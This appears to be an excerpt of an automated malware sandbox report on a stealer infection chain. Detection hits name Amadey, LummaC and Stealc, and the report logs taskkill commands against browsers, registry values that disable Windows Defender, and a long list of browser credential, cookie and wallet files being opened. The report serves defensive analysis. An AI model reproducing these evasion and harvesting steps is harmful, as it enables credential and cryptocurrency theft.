Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp, deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp, random[1].exe1.5.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: &CProgram Manager
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: RProgram Manager
Source: YQEN9A9QU4P1VROBPV5YS.exe, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487806714.000000000075C000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: \Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003039001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003039001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221899920.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2713118781.00000000056EF000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2713360207.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2724741718.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2937290461.0000000001A75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 32.2.KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.99Q4Y3O9GBOXYTDVM9GPHI.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2947624968.00000000004D1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2372324110.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2905323869.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2461719717.0000000000521000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2743978595.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2785010613.0000000000C71000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2475357445.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000022.00000003.2989652207.000000000114F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 5856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 6976, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 31.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2721535335.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018675741.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2766160676.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018412209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003208783.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2961232929.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875184699.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2862123172.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875355609.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2854773209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2855075944.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003112537.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: efe6fe4127.exe, 00000009.00000003.2697127917.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: efe6fe4127.exe, 00000009.00000003.2697127917.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2221768283.0000000000A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: ExodusWeb3
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2209806548.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
